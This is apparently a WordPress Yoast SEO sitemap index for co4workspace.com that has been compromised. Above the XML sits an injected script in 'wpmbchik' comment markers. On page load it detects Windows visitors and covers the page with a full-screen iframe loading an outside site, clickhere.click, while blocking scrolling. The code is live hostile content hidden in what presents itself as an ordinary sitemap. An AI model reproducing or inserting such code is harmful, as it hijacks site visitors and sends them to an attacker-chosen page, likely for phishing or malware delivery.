
<!-- wpmbchik -->
<script>
function createModal(url) {
  const overlay = document.createElement('div');
  Object.assign(overlay.style, {
    position: 'fixed',
    top: '0px',
    left: '0',
    width: '100%',
    height: '100%',
    background: '#fff',
    zIndex: '9999',
    margin: '0',
    padding: '0'
  });

  const iframe = document.createElement('iframe');
  iframe.src = url;
  iframe.allowFullscreen = true;
  Object.assign(iframe.style, {
    width: '100%',
    height: '100%',
    border: 'none',
    display: 'block'
  });

  overlay.appendChild(iframe);
  document.body.appendChild(overlay);

  // Блокируем прокрутку основной страницы
  document.body.style.overflow = 'hidden';
}
document.addEventListener('DOMContentLoaded', () => {
  const isWindows = /Win/i.test(navigator.userAgent);
  
  if (isWindows) {
    createModal('http://clickhere.click');
  }
});


</script>
<!-- /wpmbchik -->
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//co4workspace.com/wp-content/plugins/wordpress-seo/css/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://co4workspace.com/post-sitemap.xml</loc>
		<lastmod>2026-04-25T13:44:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://co4workspace.com/page-sitemap.xml</loc>
		<lastmod>2026-04-21T04:21:11+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://co4workspace.com/metform-form-sitemap.xml</loc>
		<lastmod>2026-04-20T23:58:41+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://co4workspace.com/category-sitemap.xml</loc>
		<lastmod>2026-04-25T13:44:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://co4workspace.com/author-sitemap.xml</loc>
		<lastmod>2025-08-01T03:44:32+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Yoast SEO -->